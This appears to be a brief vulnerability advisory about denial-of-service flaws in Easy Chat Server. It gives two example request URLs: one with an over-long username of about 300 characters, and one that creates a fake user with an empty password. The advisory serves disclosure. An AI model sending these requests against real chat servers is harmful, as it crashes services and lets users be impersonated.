Easy Chat Server Multiple Denial Of Service Vulnerabilities

info
discussion
exploit
solution
references

Easy Chat Server Multiple Denial Of Service Vulnerabilities

No exploit is required.

An example of a long username URI:
http://www.example.com/chat.ghp?username=aaaa[ 295 of a ]aaaa&password=&room=1&sex=0

An example of creating a fake user:
http://www.example.com/chat.ghp?username=FakeUser&password=&room=1&sex=0